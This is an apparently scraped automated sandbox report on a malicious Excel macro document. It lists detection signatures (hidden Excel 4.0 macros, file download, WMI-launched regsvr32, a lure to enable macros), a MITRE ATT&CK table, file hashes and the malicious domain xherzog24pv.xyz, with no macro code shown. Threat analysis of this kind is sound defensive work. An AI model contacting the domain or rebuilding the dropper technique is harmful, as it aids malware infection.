Analysis Report Documents (252).xlsm
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Wmic Launch regsvr32 | Show sources |
Source: | Author: Joe Security: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Potential document exploit detected (performs DNS queries with low reputation score) | Show sources |
Source: | DNS query: |
Source: | DNS query: |
Networking: |
---|
Office document connecting to suspicious TLD | Show sources |
Source: | DNS traffic detected: |
Outdated Microsoft Office dropper detected | Show sources |
Source: | DNS query: |
Performs DNS queries to domains with low reputation | Show sources |
Source: | DNS query: |
Source: | DNS traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Contains functionality to create processes via WMI | Show sources |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Persistence and Installation Behavior: |
---|
Creates processes via WMI | Show sources |
Source: | WMI Queries: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Last function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation21 | DLL Side-Loading1 | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting21 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution31 | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
xherzog24pv.xyz | unknown | unknown | true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
No contacted IP infos |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382991 |
Start date: | 07.04.2021 |
Start time: | 02:14:15 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 31s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Documents (252).xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLSM@5/14@1/0 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
02:15:10 | API Interceptor |
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133170 |
Entropy (8bit): | 5.371008837049652 |
Encrypted: | false |
SSDEEP: | 1536:ZcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:5VQ9DQW+zTXiJ |
MD5: | 5DB1A55B07BB8D56FD0EB788248F4D96 |
SHA1: | C2FA81884E6C84D3BDE2D6EC30C034621AD62280 |
SHA-256: | 14D3E8A56B4E76CACE007D18A6BC9159F6385915D7052A14181AD400D7BF95ED |
SHA-512: | C408789701671C045A72AA3D3C44B7D13A75F5AA3D1F446F21909CEAD76F6F9C19DCAD47D2FCF2D76ADCFE9E8465009C30CC03F7EBAC214AD43068941B0573B4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 15644 |
Entropy (8bit): | 7.974497191204788 |
Encrypted: | false |
SSDEEP: | 384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf |
MD5: | 29A9EE6FB5591751FC60ECD0FDB9478D |
SHA1: | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 |
SHA-256: | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F |
SHA-512: | 5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 15644 |
Entropy (8bit): | 7.974497191204788 |
Encrypted: | false |
SSDEEP: | 384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf |
MD5: | 29A9EE6FB5591751FC60ECD0FDB9478D |
SHA1: | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 |
SHA-256: | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F |
SHA-512: | 5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 277688 |
Entropy (8bit): | 7.553565332828095 |
Encrypted: | false |
SSDEEP: | 1536:2OOQStlBQdeequOVllS/2HMBh3DdCG/gsux9R+XkXwGHZEYJtttgBAcBoCwsYijf:2ZllSdosux9RbXwGXJtttYlBJDy2sC |
MD5: | 7F8E2F250B102531058343060B1A85D4 |
SHA1: | DD7A964CB4296F66F817D8ADDD7C98A8CE82E786 |
SHA-256: | E9B1B7DE87303FBBFE2CB786FED20B2A5412BE614FAA6BC346AB4F2473E13818 |
SHA-512: | B2F2350D2358BAF844012C8E8B77F0C9D1554D720BB3CBC6323902F1394ADDE760850F803D72C5DFC26FE9FC3E8B26CF14B65CF5FAE56FA4F0FA43E36FFC8689 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.664611778571911 |
Encrypted: | false |
SSDEEP: | 12:8uXUU+uElPCH2AlA/Ydfge+WrjAZ/2bD8q5LC5Lu4t2Y+xIBjKZm:889lA8AZiD8l87aB6m |
MD5: | 6CE3AFC945BE909FF190D896DD565667 |
SHA1: | DF73D53BE84ABFF95A80CD9D182CF41449C910BE |
SHA-256: | DA6A220EF782C366DA90F0ED03AB3AB55A895E2B14F1442F9278E9081E886111 |
SHA-512: | 42BA2B4B89AECC3B0709E4087489354CA41CBCDE70CA41D0048814FCD206EDC84DCED7E42D1FC4AFD9588FD5C29CF79DF46EC9E9C018D8D1D0F5C65F80257C5E |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4340 |
Entropy (8bit): | 4.751501502393159 |
Encrypted: | false |
SSDEEP: | 48:8kn74oxXHkB6pkn74oxXHkB6pXn74oxXHkB6pXn74oxXHkB6:8k7b3kKk7b3kK37b3kK37b3k |
MD5: | 45C1EF5A74928CCC6915D627FC86A023 |
SHA1: | ED7A22CEB778A70680BA3D7BE750CA0D8510340B |
SHA-256: | 7097F37386BBDDB323256B0A956516B158499DF099D2E160EFCF45B2A16F9D5C |
SHA-512: | 5D5F9AA38024C247F8991ECD492C5D1E51B85E1399DC5F2088D7B6E143F92E1F3E12D95AB61B9843B311817940B7E84E32B57E66B14A189AE21ACA565D237960 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 243 |
Entropy (8bit): | 4.67797989421538 |
Encrypted: | false |
SSDEEP: | 6:dj/HXPWEQSGXPWEdHXPWEQSGXPWEdHXPWEQSGXPWEdHXPWEc:dTHZfGZdHZfGZdHZfGZdHZc |
MD5: | D278AEF83499DC4E2D53C88DE6CB4283 |
SHA1: | 54A4A6A577D6B5D06B2911D92C4045AA98C0972B |
SHA-256: | 50A0B13E409E7BA0B55879078E3C1A34A5F509F6DAF4EC7D5A8AB054DAC08440 |
SHA-512: | 37EAFE9906D739177EE86ADF69C63E478D27E4C29F2F547764B4AEA19F4792E6002610200C0204544C6865B64E80A45677B4148D0E64EB5B0685A24990CEAD31 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 277679 |
Entropy (8bit): | 7.553526172386211 |
Encrypted: | false |
SSDEEP: | 1536:LOOQStlBQdeequOVllS/2HMBh3DdCG/gsux9R+XkXwGHZEYJtttgBAcBoCwsYijn:LZllSdosux9RbXwGXJtttYlBJDy2sS |
MD5: | AD8790A31A98D48645566DBA29BC9371 |
SHA1: | EB5A23745B961BB360C1773D33FB40D96CF3AF79 |
SHA-256: | FDD3B70E991EDB4999AD263C8A83ECAB00072DD5128F011848B2C9687FAAD715 |
SHA-512: | E710D48835E154D4D38C4CE11D16A54D0160DA4406DE7C807C0E89AB4676AF3A423FAA0AB41F6CBDCADF647E80328D2584FFE8BC8D250296B25C21BB561D1ED5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 495 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1 |
MD5: | 28C0C942161F749E335A76E714AACA29 |
SHA1: | 53D07F227E4A2F3AF5373958409A19DE1FA1CF9C |
SHA-256: | BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5 |
SHA-512: | 075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE |
Malicious: | true |
Preview: |
|
Process: | C:\Windows\SysWOW64\wbem\WMIC.exe |
File Type: | |
Category: | dropped |
